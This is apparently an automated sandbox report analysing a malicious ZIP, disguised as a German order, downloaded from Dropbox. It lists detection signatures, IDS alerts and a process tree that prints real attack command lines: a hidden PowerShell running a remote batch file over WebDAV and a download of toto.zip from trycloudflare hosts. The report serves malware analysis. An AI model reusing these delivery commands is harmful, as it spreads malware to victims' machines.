Edit tour
Windows
Analysis Report
https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Sigma detected: rundll32 run dll from internet
Suricata IDS alerts for network traffic
Downloads suspicious files via Chrome
Opens network shares
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64_ra
- chrome.exe (PID: 5908 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - chrome.exe (PID: 5700 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2240 --fi eld-trial- handle=191 2,i,934271 4929990700 637,795785 7642515349 934,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- chrome.exe (PID: 6544 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://dl.dr opboxuserc ontent.com /scl/fi/kz w07ghqs05m fyhu8o3ey/ Bestellung VRG020002. zip?rlkey= 27cmmjv86s 5ygdnss2oa 80i1o&st=8 6cnbbyp&dl =0" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- rundll32.exe (PID: 7044 cmdline:
C:\Windows \System32\ rundll32.e xe C:\Wind ows\System 32\shell32 .dll,SHCre ateLocalSe rverRunDll {9aa46009 -3ce0-458a -a354-7156 10a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 6336 cmdline:
rundll32.e xe C:\Wind ows\system 32\davclnt .dll,DavSe tCookie th eme-crack- emissions- perspectiv es.tryclou dflare.com @SSL https ://theme-c rack-emiss ions-persp ectives.tr ycloudflar e.com/ MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 4912 cmdline:
rundll32.e xe C:\Wind ows\system 32\davclnt .dll,DavSe tCookie th eme-crack- emissions- perspectiv es.tryclou dflare.com @SSL https ://theme-c rack-emiss ions-persp ectives.tr ycloudflar e.com/ MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 7072 cmdline:
rundll32.e xe C:\Wind ows\system 32\davclnt .dll,DavSe tCookie th eme-crack- emissions- perspectiv es.tryclou dflare.com @SSL https ://theme-c rack-emiss ions-persp ectives.tr ycloudflar e.com/DE/b estellung- DKM00392pd f.lnk MD5: EF3179D498793BF4234F708D3BE28633)
- cmd.exe (PID: 4824 cmdline:
"C:\Window s\System32 \cmd.exe" /c start / b powershe ll -Window Style Hidd en -Comman d "cmd /c '\\theme-c rack-emiss ions-persp ectives.tr ycloudflar e.com@SSL\ DavWWWRoot \tue.bat' analyze" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6572 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5016 cmdline:
powershell -WindowSt yle Hidden -Command "cmd /c '\ \theme-cra ck-emissio ns-perspec tives.tryc loudflare. com@SSL\Da vWWWRoot\t ue.bat' an alyze" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 1668 cmdline:
"C:\Window s\system32 \cmd.exe" /c \\theme -crack-emi ssions-per spectives. trycloudfl are.com@SS L\DavWWWRo ot\tue.bat analyze MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - Acrobat.exe (PID: 2836 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \Downloads \LSBIHQFDV T.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 6616 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 4392 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=22 76 --field -trial-han dle=1564,i ,778211226 2489688426 ,129908743 6686550167 2,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - timeout.exe (PID: 2040 cmdline:
timeout /t 5 MD5: 100065E21CFBBDE57CBA2838921F84D6) - powershell.exe (PID: 6880 cmdline:
powershell -Command "try { [Ne t.ServiceP ointManage r]::Securi tyProtocol = [Net.Se curityProt ocolType]: :Tls12; In voke-WebRe quest -Uri 'https:// retailer-i ndicators- resume-key .trycloudf lare.com/t oto.zip' - OutFile 'C :\Users\us er\Downloa ds\toto.zi p' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
- rundll32.exe (PID: 1512 cmdline:
rundll32.e xe C:\Wind ows\system 32\davclnt .dll,DavSe tCookie th eme-crack- emissions- perspectiv es.tryclou dflare.com @SSL https ://theme-c rack-emiss ions-persp ectives.tr ycloudflar e.com/tue. bat MD5: EF3179D498793BF4234F708D3BE28633)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-25T10:16:35.799655+0200 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 58424 | 104.16.230.132 | 443 | TCP |
2024-10-25T10:16:49.915206+0200 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 58430 | 104.16.230.132 | 443 | TCP |
2024-10-25T10:16:50.806401+0200 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 58432 | 104.16.230.132 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-25T10:17:12.560254+0200 | 2030697 | 1 | Malware Command and Control Activity Detected | 192.168.2.17 | 58435 | 104.16.230.132 | 443 | TCP |
2024-10-25T10:17:13.469353+0200 | 2030697 | 1 | Malware Command and Control Activity Detected | 192.168.2.17 | 58436 | 104.16.230.132 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |